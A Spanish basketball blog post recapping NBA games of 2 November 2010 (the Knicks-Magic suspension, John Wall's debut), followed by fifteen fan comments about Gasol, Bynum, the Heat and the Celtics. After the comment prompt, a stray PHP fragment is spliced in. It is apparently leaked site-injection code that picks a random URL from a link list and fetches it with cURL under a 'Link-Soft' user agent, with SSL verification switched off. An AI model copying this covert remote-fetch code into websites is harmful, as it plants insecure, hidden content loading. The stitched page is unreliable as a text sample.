La crónica (02/11/2010)

03 de November de 2010 por TheDeerHunter

La noticia no fue la victoria sin paliativos de los grandes contendientes frente a sus rivales de turno. La noticia fue la suspensión del Orlando@New York, la primera suspensión de un partido en la historia del Madison por motivos de seguridad.

La versión oficial habla de la extraña presencia de materiales tóxicos en el aire del recinto, concretamente amianto. Según otras fuentes en una concentración y un estado que no podía implicar riesgos para la salud. Desde otros medios se indica que la razón real fue un problema de mantenimiento tras el partido la noche anterior de los Rangers de la NHL. Ya nos lo estamos imaginando, abren las puertas del recinto y en lugar de una cancha se encuentran una pista de patinaje sobre hielo. Liada, liada. Si fuera así vaya choteo de organización. Lo que les faltaba. En anteriores ocasiones los motivos habían sido más contundentes. La gran nevada sobre la ciudad en el 96 o el histórico apagón en 1965.

Baloncestícamente la noche no dio para grandes sorpresas. Lo mejor nos lo ofreció John Wall, quedándose a un “tris” de registrar un triple doble y ganando en su debut en casa contra los Sixers en la prórroga. Un partido de infarto que los visitantes bien podrían haber ganado. Brand al contrario de lo que pensábamos al principio está jugando muy bien y ayer Louis Williams se salió desde el banquillo. Casualmente el 2º triple (y también la segunda canasta) de Cartier Martin en el último suspiro logró empatar el choque. Después todo fue una lotería… aunque no ayudará a estrenarse a Philadelphia el nivel de titulares como Hawes y Nocioni, el malestar por la situación de renovación de Thaddeus y el flojo inicio de Iguodala o Turner.

El resto, sin novedad en el frente. Atlanta apenas tuvo que sudar con Cleveland, Celtics o Heat mucho menos contra Pistons o Wolves. Decepcionaron los Bucks contra Portland y los Lakers se pasearon contra los “osetes”, con un juego colectivo deslumbrante.

PREMIOS

MVP+Rookie: John Wall firmó 29 puntos, 13 asistencias, 9 robos y 2 rebotes. También perdió 8 balones (está de moda la búsqueda de cuadruples dobles). Cuidado porque estamos ante el segundo jugador de la historia que logra al menos 70 puntos y 30 asistencias en sus tres primeros partidos. El otro fue un tal Oscar Robertson.

La sorpresa: Rudy es otro de esos tipos que pone un circo y le crecen los enanos. Anoche el mejor de los Blazers fue Wes Matthews, con 18 puntos, 5 rebotes y 4 asistencias frente al discreto partido del nuestro.

La decepción: El estado de forma de Salmons y, peor aún, el de Ilyasova. ¿Qué les pasa, Lemontus?

El mayor esfuerzo en vano: Mr. 20-10 ha vuelto y ójala que dure. Sin embargo, de momento no sirve para que su equipo gane algún partido.

INCOMING: 12 choques la próxima madrugada. Tenemos ganas de ver a Orlando, que con la suspensión de anoche sólo ha disputado dos encuentros y uno de ellos terriblemente decepcionante. Hoy jugarán contra el triángulo de los Wolves. Además será noche intensa en el Oeste, con Mavs@Nuggets, Hornets@Rockets y Spurs@Suns como platos más jugosos.

Comenta

15 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Voy a lanzar una pregunta que se puede convertir en un debate: Alguien imaginaba en aquella noche de octubre de 2001 que Gasol iba a jugar a este nivel? Yo sinceramente no me puedo creer que viendo a ese jugador del 2001 se iba a convertir en el mejor pivot de la liga y promediando número de megaestrella, sí MEGAESTRELLA y con el quinto mejor contrato de la liga (bien pagado por lo que se paga por ahí). Veis factible que pueda mantener estos números todo el año? Si es así estamos hablando de competir por MVP de la temporada, palabras mayores.

    Un saludo,
    Pablo

      Citar

  2. Rompe dice:
    #2

    Los Heat empiezan a dar miedo. Sorprendentemente hay balones para todos, no sólo para sus tres estrellas. Hasta 6 jugadores, si no recuerdo mal, en dobles figuras. Y Bosh un poco apagado en este inicio de temporada.
    Y un dato curioso. Parece que Lebron se ha olvidado completamente de las estadísticas. En este partido no ha cogido ni un solo rebote, “admirable”…

      Citar

  3. TheDeerHunter dice:
    #3

    Nunca he creído en la figura de Pau como MVP público. Él siempre le ha dado mayor importancia a otros aspectos, como es la victoria.
    Creo que el hipotético caso de que Pau entrara en esa carrera no sería beneficioso para el equipo. Y eso que Kobe ya no es el que era en ese sentido.
    Tampoco creo que la configuración actual del equipo beneficie un impulso al MVP. Mucho menos para dos capos simultáneamente. No creo que pueda mantener este ritmo tanto tiempo.

    Sobre la primera pregunta. No soy sospechoso. Siempre he admirado a Gasol incondicionalmente. De todas formas no esperaba tal nivel. No esperaba que explotara de esta manera en la madurez de su carrera.

      Citar

  4. nacho dice:
    #4

    Va a ser que el jovencito dientes de anuncio no es tan malo. A ver lo que le dura (que le hagan caso). Lo siento por los que querían la gomina de Pat cerca del parqué, (es probable que baje a él cuando se retire el Zen, no sea que le de pal pelo) Bosh siempre me pareció un bluff, bueno, pero nada más. Hoy no se puede decir que LeBron le haya quitado rebotes. Parece que Wade impone jerarquía. ¿Durará?, digo, el buen rollito jugamos todos.
    Lo de Gasol es… la hostia. Lo que pasa es que miramos mal. Los que intentamos ser objetivos le bajamos valoración en cuanto vemos titulares de Marca o As. A ver si estos arbolillos nos dejan ver el bosque y lo valoramos en su justa medida (vale, ya se que también están nuestros gustos y tal), yo pronostico que este año se lleva el MVP, a no ser que Rondo siga repartiendo lo que está repartiendo. Pedazo máquina el crack.
    A ver si me siento a ver a Durant, porque el premio está entre los tres.

      Citar

  5. Scriers dice:
    #5

    Yo ayer vi un rato a Miami y a Boston jugar con Detroit. Da pena ver a Tmac arrastrarse y sin hacer nada cuando sale al campo, sin recibirla siquiera. Por lo demás, Boston tiene una cantidad de recursos brutales, pero el líder hoy por hoy me parece Rondo, que manera de llevar la batuta, hasta metió un triple en el último segundo. Creo que Boston ha conseguido que lo menos importe sean los números y más la química, y eso que tiene un puñado difícil de controlar. Meritazo de su entrenador.
    Y a Miami le queda mucho por delante. Por ejemplo, para mí hoy por hoy Boston y Orlando deben estar por encima claramente. Y del Oeste hay tres o cuatro que me parecen mejor preparados. Pero hablo hoy por hoy, que hay 10% de química.
    Y luego impresiona ver a los Lakers tan sobrados y jugando a nivel enorme. Vendrán las dificultades, pero da la sensación de que el equipo se siente confiado ante cualquier reto, por importante que sea.

      Citar

  6. sergio dice:
    #6

    He leido en la pagina de la NBA que los Lakers, hasta el partido contra Miami el dia de Navidad solo jugarán 3 partidos contra equipos que el año pasado ganaron una ronda de Playoffs. Una contra Utah y dos contra… Phoenix. Aunque engañe un poquito la noticia, ya que también jugarán contra equipos como Chicago, Milwaukee y creo que Denver y Portaland… parece que tienen un primer tercio de la temporada algo más tranquilo que el resto no?

    Vamos que jugando como ayer no les hacen falta demasiadas ayudas. Barnes, Blake y hasta Caracter y Ratliff están jugando muy dignamente. Y lo de Gasol ayer me parece su mejor partido porq no llegó a jugar siquiera los 30 minutitos de rigor. Ahora mismo es el 3º en eficacia de la liga tras Scola y Millsap.. es decir, el mejor entre los candidatos a puestos altos en la regular.

    Por cierto… Roy Hibbert siempre asistió tan bien como viene haciendo hasta ahora???

      Citar

  7. pcerezo dice:
    #7

    Deer, lo más grande de Pau es que esos números le salen, los hace sin perder la visión del equipo y creo que eso es lo más grande.
    Por cierto, tú que eres un Laker, tal y como está el equipo, jugando bien, tranquilo, acoplando sin mucha dificultadad a Barnes y Blake, con Kobe a un 50% de sus posibilidades, con Odom a su ritmo y Gasol sin palabras, traspasariás a Bynum o se te queda un poco corto el juego interior?

    Pablo

      Citar

  8. red pèrill dice:
    #8

    Yo veo que sin Bynum acostumbran a jugar mejor, y viendo lo irresponsable que es, yo a lo mejor planteaba un traspaso. De hecho sin él, Odom se encuentra mucho mejor, que no es moco de pavo… veo a los lakers mejor que nunca, este banquillo está respondiendo de maravilla.

    Seguid así, saludos!!

      Citar

  9. LEmontus dice:
    #9

    Gran verdad bynum hace que LAL juegue peor… y Odom es bastante mejor y se adapta mejo al juego de Pau y Kobe. Yo no lo tradearía porque no hace falta pero si lo relgaría a la suplencua y para dar descanso a Odom y Pau,

    Mis bucks fatal Salmons catastrófico , Maguette es muy chupón y Bogut no termina de ser el del año pasado.

    Espero que Scott arregle algo auque el partido de hoy contra Boston,,,,

      Citar

  10. TheDeerHunter dice:
    #10

    Yo creo que sin Bynum cojo no tendríamos un anillo.
    La respuesta es que ni de coña tocaría nada ahora mismo. Confío todavía en una vuelta positiva de Bynum. La suerte que tienen Lakers y no otros equipos es que de momento se pueden permitir el lujo de esperar.

      Citar

  11. Denise dice:
    #11

    Vaya vendaval los Lakers, si no hay lesiones, arrasarán en el Oeste y a esperar bien descansaditos hasta la final. Pau estratosférico, Odom, ¿cuanto tiempo hacía que se marcaba 4 partidazos seguidos??… y sí, estoy indignado, los Lakers aprovechandose del gran rendimiento de Barnes, y nosotros teniendo que aguantar a Quentin y Duhon.
    Por los Memphis, Thabeet me volvió a decepcionar ( y lo puse como mIP!!! en la porra), y Darrel Arthur no me gusta en absoluto. Aun así, les doy la ultima plaza de PO.

      Citar

  12. Viva_Dirk dice:
    #12

    @Sergio: Hibbert ha sido un center siempre bastante completo, falto de garra natural como la que pueden tener Scola o Horford, pero bueno en todo lo demás. Le hacia falta gimnasio y confianza, va a ser un gustazo verlo por las canchas.

    Respecto a Bynum estoy con Deer, no necesitamos traspasarlo, llegará el momento de la temporada en el que Gasol no este tan fino físicamente y Odom ha empezado fuerte porque tuvo Mundial, pero Bynum sano o medio sano es un buen refuerzo para ese juego interior. Aunque claro, si me dices que a cambio traemos al mencionado Hibbert, me lo pienso, jeje.

      Citar

  13. LEmontus dice:
    #13

    Por cierto respondiendo a la pregunta de la crónica Salmons el año pasado sus ataques eran 70% entradas este año está abusando del triple y tiros bastante lejanos y difíciles de los que no mete uno…. y además sus defensas son bastante malas.

    Ilyasova por el contrario se caracteriza por su gran tiro tanto medio como de tres y su defensa. En defensa no se la ha visto tampoco ha tenido mucho trabajo y lo del tiro…. ha tenido bastantes tiros abiertos que ha fallado y me extraña porque el ha tenido el mundial para en verano y supuestamente debería llegar mejor que el resto.

    en general creo que Salmons tiene exceso de confianza y Ersan está falto de ella…. Lo único que se que solo Delfino y Jennings no pueden ganar todos los partidos.

      Citar

  14. GreenPride dice:
    #14

    Jornada de paseos de los grandes. En los Heat, Wade comanda el ataque mientras Lebron asiste sobre todo a los tiradores (Jones, House) para que se pongan las botas a triples. Aún les queda encontrar algo de juego interior con Bosh porque de lo contrario lo pasarán mal en partidos grandes.
    Boston ganó con suficiencia. Rondo increible a una media de casi 17 asistencias en sus 4 partidos, Garnett muy recuperado, Pierce y Allen sumando, Jermaine bien y el banquillo cumpliendo ganaron sin ningún problema a unos Pistons que van a tener una temporada muyyy larga
    Los Lakers con un nivel impresionante para estas alturas de temporada. Primer gran partido de Kobe en la temporada, Gasol increible (yo tampoco creía que llegaría a este nivel), Odom impresionante y el banquillo cumpliendo perfectamente. Los Grizzlies no creyeron nunca que pudieran hacer algo y así les fue. Lo peor que se dejaron llevar.

      Citar

  15. HisRoyalAirness dice:
    #15

    En este inicio de temporada me está decepcionando muchísimo Bosh, pero muchísimo. Pensé que tendría la zona dominadísima pero se le vé muy incómodo. Espero que cambie la cosa porque sino van a tener problemas serios.
    Voy a romper una lanza en favor de Lebron y Kobe, dos tíos que han empezado con una selección de tiro de asombrosa, acostumbrados a tirárselo todo; sé que cambiará esta situación pero será bonito mientras dure.
    Y, mi humilde opinión, es que Bynum es pieza FUNDAMENTAL en el engranaje de los Lakers y prescindir de sus servicios sería un error muy grave. No olvidemos que Odom es una escopeta de feria que se pilla “vacaciones” de rendimiento demasiado de vez en cuando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>